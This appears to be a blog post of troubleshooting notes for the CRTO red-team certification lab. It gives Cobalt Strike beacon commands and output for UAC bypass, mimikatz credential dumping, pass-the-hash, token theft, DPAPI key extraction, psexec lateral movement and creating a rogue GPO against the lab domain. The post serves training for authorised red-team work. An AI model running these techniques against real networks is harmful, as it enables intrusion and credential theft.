Troubleshooting and debugging notes for CRTO – Certified Red Team Operator by Zero-Point Security using Cobalt Strike. If you encounter other issues/bugs that should be included write me on twitter @msd0s7 and I’ll add them.
Windows VirtualBox networking
If you have issues to configure the Windows VM within Virtual Box, the following is my configuration that works as intended in the course. You may need to play with route add and route delete to adjust the route table, and to make sure the Virtual Box Network card settings match the Windows network cards as shown in the image:
Can’t access mail server
Try HTTPS, it seems there is not redirect from port 80 to 443 so make sure you access the web interface over secure channel.
Bloodhound can’t find AD
System.DirectoryServices.ActiveDirectory.ActiveDirectoryOperationException: Current security context is not associated with an Active Directory domain or forest.
- After I ran the elevate
uac-token-duplicationand I got a new shell with administrative privileges (user*) I could not run bloodhound – complains about user not being associated with an Active Directory domain or forest. To fix this, either run mimikatz from the initial shell where we have regular user permissions, or bypass uac and get a rev shell as SYSTEM. To do this use the svc-exe elevate module + an smb beacon listener (similar to “Can’t run mimikatz”)
Can’t run mimikatz
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 750674 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
After I bypassed uac using the uac-token-duplication elevate module, I got a new shell with administrative privs (user *) however it was still not possible to run mimikatz (ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)). Solution (https://youtu.be/5gwEMocFkc0?t=5450):
- Create a new smb beacon listener as shown below
- From the elevated shell, run:
beacon> elevate svc-exe smb-beacon
This will open a new shell which has SYSTEM privileges
This new shell will have enough privileges to run mimikatz.
The NetworkCredentials provided were unable to create a Kerberos credential
I encountered this error when Requesting the SPN Ticket for Kerberoasting but this should be the case for trying to access any resources on the network that require authentication.
To fix the problem, we need the NTLM hash of a domain user and use it for the pass-the-hash (pth). From the GUI, select Access -> Make token and select the user to impersonate. If we previously ran mimikatz on our current machine, the NTLM hash for that user should be displayed so just select that one. Or from the command line:
beacon> pth DOMAIN\user <NTLM_HASH>
This will run mimikatz pass the hash in the background
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:"%COMSPEC% /c echo 1bc24ed59d8 > \\.\pipe\e63761" command
After this, we should be able to access resources on the network that require authentication such as requesting SPN tickets for kerberoasting
No credentials in the vault
While trying to dump the windows credentials from the vault using vaultcmd /listcreds:"Windows Credentials" /all nothing was returned.
The reason for this was that I was running as SYSTEM, while the creds were saved under another user (s.bowers). To fix this, impersonate the target user: list the processes and steal the token of one of the processes of that user.
beacon> steal_token 2724
[*] Tasked beacon to steal token from PID 2724
[+] host called home, sent: 12 bytes
[+] Impersonated CYBER\s.bowers
Can’t retrieve the actual MasterKey from the Domain Controller
If you run the mimikatz command from the beacon similar to:
beacon> mimikatz dpapi::masterkey /in:C:\Users\s.bowers\AppData\Roaming\Microsoft\Protect\S-1-5-21-3865823697-1816233505-1834004910-1132\fcf4f725-0947-4180-a924-bc9da9ed8910 /rpc
[*] Tasked beacon to run mimikatz's dpapi::masterkey /in:C:\Users\s.bowers\AppData\Roaming\Microsoft\Protect\S-1-5-21-3865823697-1816233505-1834004910-1132\fcf4f725-0947-4180-a924-bc9da9ed8910 /rpc command
[+] host called home, sent: 1006154 bytes
You may get an error like the following instead of the key/sha1:
[domainkey] with RPC
[DC] 'cyberbotic.io' will be the domain
[DC] 'dc-1.cyberbotic.io' will be the DC server
ERROR kull_m_rpc_bkrp_generic ; BackuprKey: 0x0000000c (12)
To fix it, add an @ before the dpapi mimikatz command such as:
beacon> mimikatz @dpapi::masterkey /in:C:\Users\s.bowers\AppData\Roaming\Microsoft\Protect\S-1-5-21-3865823697-1816233505-1834004910-1132\fcf4f725-0947-4180-a924-bc9da9ed8910 /rpc
Could not connect to target
Upon trying to jump to another host using psexec, the shell would fail to connect with the error “Could not connect to the target”, even tough I could list directory in \\target\c$. The issue was that I was using the localhost-tcp listener
beacon> jump psexec64 WKSTN-2429 localhost-tcp
[*] Tasked beacon to run windows/beacon_bind_tcp (127.0.0.1:4444) on WKSTN-2429 via Service Control Manager (\\WKSTN-2429\ADMIN$\07a0157.exe)
[+] host called home, sent: 1040164 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
Started service 07a0157 on WKSTN-2429
[-] Could not connect to target
Make sure the beacon binds to 0.0.0.0 and not only to localhost
beacon> jump psexec64 WKSTN-2429 tcp
[*] Tasked beacon to run windows/beacon_bind_tcp (0.0.0.0:5555) on WKSTN-2429 via Service Control Manager (\\WKSTN-2429\ADMIN$\733ceea.exe)
[+] host called home, sent: 289462 bytes
[+] received output:
Started service 733ceea on WKSTN-2429
[+] established link to child beacon: 10.10.121.110
elevate uac-token-duplication – Failed. Tried 1 process tokens and taskmgr.exe
As my user was part of the Administrators group, I tried to elevate my privileges and bypass UAC using the token duplication module, however it would fail:
beacon> elevate uac-token-duplication
[*] Tasked beacon to spawn windows/beacon_bind_tcp (127.0.0.1:4444) in a high integrity process (token duplication)
[+] host called home, sent: 215464 bytes
[+] received output:
[-] Failed. Tried 1 process tokens and taskmgr.exe
[-] Could not connect to target
[+] host called home, sent: 12 bytes
Reason for the error was that I was running from an x86 process. Solution was to inject into a x64 process, then I was able to use the token-duplication module
x86 beacon> inject 4544 x64 localhost-tcp
[*] Tasked beacon to inject windows/beacon_bind_tcp (127.0.0.1:4444) into 4544 (x64)
[+] host called home, sent: 255024 bytes
[+] established link to child beacon: 10.10.121.106
x64 beacon> elevate uac-token-duplication
[*] Tasked beacon to spawn windows/beacon_bind_pipe (\\.\pipe\msagent_94fb) in a high integrity process (token duplication)
[+] host called home, sent: 274762 bytes
[+] received output:
[+] Success! Used token from PID 3108
[+] established link to child beacon: 10.10.121.106
Can’t create new gpo link
The error below occurs when trying to create a new GPO link without a kerberos ticket. To fix, run beacon> make_token cyberbotic.io\n.lamb <password>
beacon> powershell New-GPO -Name 'Totally Legit GPO' | New-GPLink -Target 'OU=3268,OU=Workstations,DC=cyberbotic,DC=io'
[*] Tasked beacon to run: New-GPO -Name 'Totally Legit GPO' | New-GPLink -Target 'OU=3268,OU=Workstations,DC=cyberbotic,DC=io'
[+] host called home, sent: 537 bytes
[+] received output:
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><Obj S="progress" RefId="1"><TNRef RefId="0" /><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><S S="Error">New-GPO : Access is denied. (Exception from HRESULT: 0x80070005 _x000D__x000A_</S><S S="Error">(E_ACCESSDENIED))_x000D__x000A_</S><S S="Error">At line:1 char:75_x000D__x000A_</S><S S="Error">+ ... 'http://127.0.0.1:14649/'); New-GPO -Name 'Totally Legit GPO' | New-G ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error"> + CategoryInfo : NotSpecified: (:) [New-GPO], UnauthorizedAccessE _x000D__x000A_</S><S S="Error"> xception_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.Gro _x000D__x000A_</S><S S="Error"> upPolicy.Commands.NewGpoCommand_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>
TRIPLA CONSULT 